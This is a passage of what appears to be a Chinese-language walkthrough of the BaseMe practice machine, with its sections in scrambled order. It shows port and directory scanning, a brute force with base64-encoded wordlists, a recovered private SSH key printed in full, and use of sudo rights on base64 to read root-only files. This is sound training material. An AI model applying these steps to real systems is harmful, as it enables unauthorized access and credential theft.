(172.20.10.3)' can't be established.\nECDSA key fingerprint is SHA256:Hlyr217g0zTkGOpiqimkeklOhJ4kYRLtHyEh0IgMEbM.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added '172.20.10.3' (ECDSA) to the list of known hosts.\nLinux baseme 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Sep 28 12:47:13 2020 from 192.168.1.59\nroot@baseme:~# cd \/root\nroot@baseme:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Sep 28 2020 .\ndrwxr-xr-x 18 root root 4096 Sep 28 2020 ..\n-rw------- 1 root root 80 Sep 28 2020 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Sep 28 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 1678 Sep 28 2020 root.txt\ndrwx------ 2 root root 4096 Sep 28 2020 .ssh\nroot@baseme:~# cat .bash_history \npasswd\nls -la\nrm .bash_history\ncd ~\nls -la\nrm .bash_history\n\/usr\/sbin\/poweroff \nroot@baseme:~# file \/usr\/sbin\/poweroff\n\/usr\/sbin\/poweroff: symbolic link to \/bin\/systemctl<\/code><\/pre>\n\u62ff\u5230rootshell\uff01\uff01\uff01\uff01<\/p>\n
\u989d\u5916\u6536\u83b7<\/h2>\nbase64\u52a0\u5bc6\u5b57\u5178<\/h3>\n
\u8fd9\u5757\u5f88\u7b80\u5355\uff0c\u5404\u4f4d\u5e08\u5085\u5927\u5c55\u8eab\u624b\uff0c\u9664\u4e86\u4e0a\u9762\u7684\u65b9\u6cd5\u5916\uff0c\u8fd8\u6709\u5e08\u5085\u7684\u89e3\u51b3\u65b9\u6cd5\u4e5f\u5f88\u4f18\u7f8e\uff0c\u8fd9\u91cc\u8bb0\u5f55\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n
https:\/\/kaianperez.github.io\/baseme\/#reconocimiento-de-puertos<\/a><\/p>\n#!\/bin\/bash\n\nwhile IFS= read -r linea\ndo\n echo $linea | base64 >> $2\ndone < $1<\/code><\/pre>\n\nIFS= read -r linea<\/code> \u8bfb\u53d6\u6bcf\u4e00\u884c\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u53d8\u91cf linea<\/code> \u4e2d\u3002IFS=<\/code> \u662f\u4e3a\u4e86\u786e\u4fdd\u4e0d\u4f1a\u53bb\u9664\u4efb\u4f55\u524d\u5bfc\u6216\u5c3e\u968f\u7684\u7a7a\u767d\u5b57\u7b26\uff08\u5305\u62ec\u7a7a\u683c\u3001\u5236\u8868\u7b26\u6216\u6362\u884c\u7b26\uff09\uff0cread -r<\/code> \u5219\u786e\u4fdd\u4e0d\u4f1a\u89e3\u91ca\u4efb\u4f55\u53cd\u659c\u6760\u5b57\u7b26\u4e3a\u8f6c\u4e49\u5b57\u7b26\u3002<\/li>\n<\/ul>\nhttps:\/\/migue27au.github.io\/C1b3r_F0lio\/challenges\/baseme.html<\/a><\/p>\n!\/bin\/bash\n\nfile=$1\nfile2=$2\nlines=$(wc $file -l | cut -d ' ' -f 1)\ntouch file2\n\nfor ((c=0; c<=$lines; c++)); do\n line=$(cat $file | head -n $c | tail -n 1)\n b64=$(echo $line | base64)\n\n echo $b64 >> $file2\ndon<\/code><\/pre>\n\nlines=$(wc $file -l | cut -d ' ' -f 1)<\/code>\uff1a\u8fd9\u884c\u4ee3\u7801\u8ba1\u7b97$file<\/code>\u6587\u4ef6\u7684\u884c\u6570\uff0c\u5e76\u5b58\u50a8\u5728\u53d8\u91cflines<\/code>\u4e2d\u3002wc -l<\/code>\u547d\u4ee4\u8ba1\u7b97\u884c\u6570\uff0ccut -d ' ' -f 1<\/code>\u4ece\u8f93\u51fa\u4e2d\u63d0\u53d6\u6570\u5b57\u3002<\/li>\nfor ((c=0; c<=$lines; c++)); do<\/code>\uff1a\u8fd9\u4e2a\u5faa\u73af\u4ece0\u5f00\u59cb\uff0c\u76f4\u5230$lines<\/code>\uff08\u5305\u542b\uff09\u3002\u7531\u4e8e\u6587\u4ef6\u884c\u6570\u662f\u4ece1\u5f00\u59cb\u8ba1\u6570\u7684\uff0c\u8fd9\u91cc\u5b9e\u9645\u4e0a\u4f1a\u591a\u6267\u884c\u4e00\u6b21\u5faa\u73af\uff0c\u5bfc\u81f4\u8bfb\u53d6\u6587\u4ef6\u7684\u6700\u540e\u4e00\u884c\u4e4b\u540e\u6ca1\u6709\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4tail -n 1<\/code>\u8f93\u51fa\u4e00\u4e2a\u7a7a\u884c\uff0c\u5e76\u5bf9\u5176\u8fdb\u884cBase64\u7f16\u7801\u3002<\/li>\n<\/ul>\n
rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 ca:09:80:f7:3a:da:5a:b6:19:d9:5c:41:47:43:d4:10 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+qOK8FpS9Ve5n4Vc\/JGRcLj5IpfEXKn2963jzjDUlYqbdLuoIAecfd53jrSp\/1FX2CjMVeQaFtFygaBzFlcL94oZg1jP60UI28mPhB+BOD7UfWSRbQbs2jIYOV5La4\/jIpc8Htyn0aGWBWL6ZrVooBmYR0yEmJRyUtnH9sQDtY5k0zIqXIO63P1DnukqTJbzXBd5s6JMa7VKx4gs1XF7xASb6ILNT\/T5U45K9e0si1fMCzwC0KXsuIBOnbBtzOUYSxlI6+PKPz\/fgrmpO86htnc8A\/af3mo9Pq6Jytrn+XjSX7hFA9UOhy8in9fUx7ZWyB5rffW0p6Vjpbxc1+bcT\n| 256 d0:75:48:48:b8:26:59:37:64:3b:25:7f:20:10:f8:70 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGzI3VdkTGf3FlIf4MVNCFjaO+1FDvyQ5lzs4W0S9pNSqzzph8oBhQaMWbUUv8EpN0EM0p0w8VY4V+MWDCqE9Pc=\n| 256 91:14:f7:93:0b:06:25:cb:e0:a5:30:e8:d3:d3:37:2b (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKWXudaqjDSze7Ec72JtitmIyqlx9OlPIrVwkVZjDMJ\n80\/tcp open http syn-ack nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\n|_http-title: Site doesn't have a title (text\/html).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: png,php,zip,git,jpg,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.3<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.3\n+ Target Hostname: 172.20.10.3\n+ Target Port: 80\n+ Start Time: 2024-04-11 23:40:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.14.2\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time: 2024-04-11 23:40:35 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\nhttp:\/\/172.20.10.3\/<\/code><\/pre>\nQUxMLCBhYnNvbHV0ZWx5IEFMTCB0aGF0IHlvdSBuZWVkIGlzIGluIEJBU0U2NC4KSW5jbHVkaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBuZWVkIDopClJlbWVtYmVyLCBCQVNFNjQgaGFzIHRoZSBhbnN3ZXIgdG8gYWxsIHlvdXIgcXVlc3Rpb25zLgotbHVjYXMK<\/code><\/pre>\n\u5c1d\u8bd5\u89e3\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u5f97\u5230\u4e00\u4e2a\u7528\u6237\u540dlucas<\/code>\uff0c\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\u4ee5\u53ca\u8bf7\u6c42\u5934\uff1a<\/p>\n<!--\niloveyou\nyouloveyou\nshelovesyou\nhelovesyou\nweloveyou\ntheyhatesme\n--><\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5jwt\u89e3\u7801\u4e00\u4e0b\uff08\u5206\u6210\u4e09\u6bb5\u7684token\uff09:<\/p>\n
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImludGVybmFsQHp1cnJhay5odGIiLCJpc0FkbWluIjp0cnVlLCJpYXQiOjEzNTY5OTk1MjQsIm5iZiI6MTM1NzAwMDAwMH0.gBpFlpNfVUBlv9HuqXqVzRtaHR265PFagumX_OAKCMY<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528base64\u7f16\u7801\u540e\u7684\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
for word in $(cat \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt);do echo $word | base64 >> b64dic.txt;done<\/code><\/pre>\n\u7136\u540e\u7b49\u4e00\u4e0b\u5c31\u884c\uff0c\u597d\u4e86\u4ee5\u540e\u8dd1\u4e00\u4e0b\uff0c\u53d1\u73b0\u6ca1\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ ls\nb64dic.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ vim b64dic.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: b64dic.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 1582805 \/ 1582812 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u5c1d\u8bd5\u6362\u4e00\u4e2a\u5b57\u5178\/usr\/share\/wordlists\/dirb\/common.txt<\/code>\uff1a<\/p>\n\n\u5c31\u8fd9\u4fe9\u5b57\u5178\u5e38\u7528\uff0c\u603b\u4e0d\u80fd\u4f7f\u7528\u5927\u5b57\u5178\u5427\uff0c\u90a3\u7b49\u6b7b\u4eba\u4e86\u3002\u3002<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ for word in $(cat \/usr\/share\/wordlists\/dirb\/common.txt);do echo $word | base64 >> b64dic.txt;done\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/baseme]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w b64dic.txt -x php,zip,git,jpg,txt,png \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: b64dic.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,git,jpg,txt,png,php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/aWRfcnNhCg== (Status: 200) [Size: 2537]\n\/cm9ib3RzLnR4dAo= (Status: 200) [Size: 25]\nProgress: 1615124 \/ 1615131 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4fe9\u76ee\u5f55\uff0c\u4e0b\u8f7d\u4e0b\u6765\u4e24\u4e2a\u6587\u4ef6\uff1a<\/p>\n
# cm9ib3RzLnR4dAo= -> robots.txt\nTm90aGluZyBoZXJlIDooCg== -> Nothing here :(\n# aWRfcnNhCg== -> id_rsa\nLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB\nQUFBQ21GbGN6STFOaTFqZEhJQUFBQUdZbU55ZVhCMEFBQUFHQUFBQUJCVHhlOFlVTApCdHpmZnRB\nZFBncDhZWkFBQUFFQUFBQUFFQUFBRVhBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDWkNY\ndkVQbk8xCmNiaHhxY3RCRWNCRFpqcXJGZm9sd1ZLbXBCZ1kwN00zQ0s3cE8xMFVnQnNMeVl3QXpK\nRXc0ZTZZZ1BOU3lDRFdGYU5US0cKMDdqZ2NncmdncmU4ZVBDTU5GQkNBR2FZSG1MckZJc0tEQ0xJ\nNE5FNTR0NThJVUhlWENaejcyeFRvYkwvcHRMazI2UkJuaAo3YkhHMUpqR2x4T2tPNm0rMW9GTkx0\nTnVEMlFQbDhzYlp0RXpYNFM5bk5aL2RweVJwTWZtQjczck4zeXlJeWxldlZERXl2CmY3Q1o3b1JP\nNDZ1RGdGUHk1VnprbmRDZUpGMll0WkJYZjVnamMyZmFqTVh2cStiOG9sOFJaWjZqSFhBaGlibEJY\nd3BBbTQKdkxZZnh6STI3QlpGbm90ZUJuYmR6d1NMNWFwQkY1Z1lXSkFIS2ovSjZNaERqMUdLQUZj\nMUFBQUQwTjlVRFRjVXh3TXQ1WApZRklaSzhpZUJMME5PdXdvY2RnYlV1a3RDMjFTZG5TeTZvY1cz\naW1NKzNteldqUGRvQksvSG8zMzl1UG1CV0k1c2JNcnBLCnhrWk1ubCtyY1RiZ3o0c3d2OGdOdUto\nVWM3d1RndHJOWCtQTk1kSUFMTnBzeFlMdC9sNTZHSzhSNEo4ZkxJVTUrTW9qUnMKKzFOcllzOEo0\ncm5PMXFXTm9KUlpvRGxBYVlxQlY5NWNYb0FFa3dVSFZ1c3RmZ3hVdHJZS3ArWVBGSWd4OG9rTWpK\nZ25iaQpOTlczVHp4bHVOaTVvVWhhbEgyREoya2hLREdRVWk5Uk9GY3NFWGVKWHQzbGdwWlp0MWhy\nUURBMW84alRYZVM0K2RXN25aCnpqZjNwME03N2IvTnZjWkUrb1hZUTFnNVhwMVFTT1Niait0bG13\nNTRMN0VxYjFVaFpnblE3WnNLQ29hWTlTdUFjcW0zRTAKSUpoK0krWnYxZWdTTVMvRE9ISXhPM3Bz\nUWtjaUxqa3BhK0d0d1FNbDFaQUpIUWFCNnE3MEpKY0JDZlZzeWtkWTUyTEtESQpweFpZcExabXlE\neDhUVGFBOEpPbXZHcGZOWmtNVTRJMGk1L1pUNjVTUkZKMU5sQkNOd2N3dE9sOWs0UFc1TFZ4TnNH\nUkNKCk1KcjhrNUFjMENYMDNmWEVTcG1zVVVWUysvRGovaG50SHc4OWRPOEhjcXFJVUVwZUViZlRX\nTHZheDBDaVNoM0tqU2NlSnAKKzhnVXlER3ZDa2N5Vm5lVVFqbW1yUnN3UmhUTnh4S1JCWnNla0d3\nSHBvOGhEWWJVRUZacXp6TEFRYkJJQWRybDF0dDdtVgp0VkJybXBNNkN3SmR6WUVsMjFGYUs4anZk\neUN3UHI1SFVndHV4clNwTHZuZGNud1BheEpXR2k0UDQ3MUREWmVSWURHY1doCmk2YklDckxRZ2VK\nbEhhRVVtclFDNVJkdjAzendJOVU4RFhVWi9PSGI0MFBMOE1YcUJ0VS9iNkNFVTlKdXpKcEJyS1or\naysKdFNuN2hyOGhwcFQydFVTeER2QytVU01tdy9XRGZha2pmSHBvTndoN1B0NWkwY3d3cGtYRlF4\nSlB2UjBiTHh2WFpuKzN4dwpON2J3NDVGaEJaQ3NIQ0FiVjIraFZzUDBseXhDUU9qN3lHa0JqYTg3\nUzFlMHE2V1pqakI0U3ByZW5Ia083dGc1UTBIc3VNCkFpZi8wMkhIeldHK0NSL0lHbEZzTnRxMXZ5\nbHQyeCtZLzA5MXZDa1JPQkRhd2pIei84b2d5MkZ6ZzhKWVRlb0xrSHdER1EKTytUb3dBMTBSQVRl\nazZaRUl4aDZTbXRERy9WNXplV0N1RW1LNHNSVDNxMUZTdnBCMS9IK0Z4c0dDb1BJZzhGemNpR0No\nMgpUTHVza2NYaWFnbnM5TjFSTE9ubEhoaVpkOFJaQTBaZzdvWklhQnZhWm5oWllHeWNwQUpwV0tl\nYmpydG9rTFl1TWZYUkxsCjMvU0FlVWw3MkVBM20xRElueHNQZ3VGdWswMHJvTWM3N042ZXJZN3Rq\nT1pMVllQb1NpeWdEUjFBN2Yzell6KzBpRkk0ckwKTkQ4aWtnbVF2RjZocnd3SkJycC8weEtFYU1U\nQ0tMdnl5WjNlRFNkQkRQcmtUaGhGd3JQcEk2K0V4OFJ2Y1dJNmJUSkFXSgpMZG1tUlhVUy9EdE8r\nNjkvYWlkdnhHQVlvYisxTT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==\n-------->\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL\nBtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1\ncbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG\n07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL\/ptLk26RBnh\n7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ\/dpyRpMfmB73rN3yyIylevVDEyv\nf7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4\nvLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj\/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X\nYFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK\/Ho339uPmBWI5sbMrpK\nxkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt\/l56GK8R4J8fLIU5+MojRs\n+1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi\nNNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ\nzjf3p0M77b\/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0\nIJh+I+Zv1egSMS\/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI\npxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5\/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ\nMJr8k5Ac0CX03fXESpmsUUVS+\/Dj\/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp\n+8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV\ntVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh\ni6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ\/OHb40PL8MXqBtU\/b6CEU9JuzJpBrKZ+k+\ntSn7hr8hppT2tUSxDvC+USMmw\/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLxvXZn+3xw\nN7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM\nAif\/02HHzWG+CR\/IGlFsNtq1vylt2x+Y\/091vCkROBDawjHz\/8ogy2Fzg8JYTeoLkHwDGQ\nO+TowA10RATek6ZEIxh6SmtDG\/V5zeWCuEmK4sRT3q1FSvpB1\/H+FxsGCoPIg8FzciGCh2\nTLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl\n3\/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL\nND8ikgmQvF6hrwwJBrp\/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ\nLdmmRXUS\/DtO+69\/aidvxGAYob+1M=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u554a\uff0c\u8fd9\u4e2a\u79c1\u94a5\u8fd8\u52a0\u5bc6\u4e86\uff1f<\/p>\n
\u5c1d\u8bd5\u7f16\u7801\u4e4b\u524d\u4e3b\u9875\u627e\u5230\u7684\u90a3\u51e0\u4e32\u76f8\u4f3c\u5b57\u7b26\uff1a<\/p>\n
iloveyou -> aWxvdmV5b3UK\nyouloveyou -> eW91bG92ZXlvdQo=\nshelovesyou -> c2hlbG92ZXN5b3UK\nhelovesyou -> aGVsb3Zlc3lvdQo=\nweloveyou -> d2Vsb3ZleW91Cg==\ntheyhatesme -> dGhleWhhdGVzbWUK\n\nfor word in $(cat pass.txt);do echo $word | base64 >> b64pass.txt;done<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0\u7b2c\u4e00\u4e2a\u5c31\u662f\u5bf9\u7684\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nlucas@baseme:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 lucas lucas 4096 Sep 28 2020 .\ndrwxr-xr-x 3 root root 4096 Sep 28 2020 ..\n-rw------- 1 lucas lucas 15 Sep 28 2020 .bash_history\n-rw-r--r-- 1 lucas lucas 220 Sep 28 2020 .bash_logout\n-rw-r--r-- 1 lucas lucas 3526 Sep 28 2020 .bashrc\ndrwxr-xr-x 3 lucas lucas 4096 Sep 28 2020 .local\n-rw-r--r-- 1 lucas lucas 807 Sep 28 2020 .profile\ndrwx------ 2 lucas lucas 4096 Sep 28 2020 .ssh\n-rw-r--r-- 1 lucas lucas 1685 Sep 28 2020 user.txt\n-rw------- 1 lucas lucas 52 Sep 28 2020 .Xauthority\nlucas@baseme:~$ cat user.txt \n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \n\nHMV8nnJAJAJA \nlucas@baseme:~$ sudo -l\nMatching Defaults entries for lucas on baseme:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lucas may run the following commands on baseme:\n (ALL) NOPASSWD: \/usr\/bin\/base64\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt \nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuICAgICAqKiAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nICAgICAgICAgICAqLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg\nICAgICAgICwgICAgICAgICAgICAgICAgICAgICAgICAgLCogICAgICAgICAgICAgICAgICAgICAg\nICAgICAKICAgICAgICAgICAgICAgICAgICAgIC4sICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAvICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAgICAgICAgICAgICAKICAg\nICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAq\nLCAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgLy4gICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgIC4qLiAgICAgICAgICAgICAgICAKICAgICAgICAgICAg\nICogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAgICAKICAgICAgICAgICAgICwqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAsKiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICoqICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKi4gICAgICAgICAgICAgICAg\nICAKICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgKiouICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgLCogICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICoqICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg\nICAgICAgICAgICAgICAgICAgKiwgICAgICAgICAgICAgICAgICAgICAgICAgICwqICAgICAgICAg\nICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgKiAgICAgICAgICAg\nICAgICAgICAgICAqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAqLCAgICAgICAgICAgICAgICAuKiAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLiAgICAgICAgICAgKiog\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICoqICAgICAgLCosICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoqICosICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAKSE1WRktCUzY0Cg==\nlucas@baseme:~$ sudo \/usr\/bin\/base64 \/root\/root.txt | base64 -d\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \n\nHMVFKBS64<\/code><\/pre>\n\u989d\uff0c\u867d\u7136\u62ff\u5230flag\u4e86\uff0c\u4f46\u662f\u4e0d\u662f\u6211\u60f3\u8981\u7684\uff0c\u7ee7\u7eed\u5c1d\u8bd5\u83b7\u53d6rootshell\uff01<\/p>\n
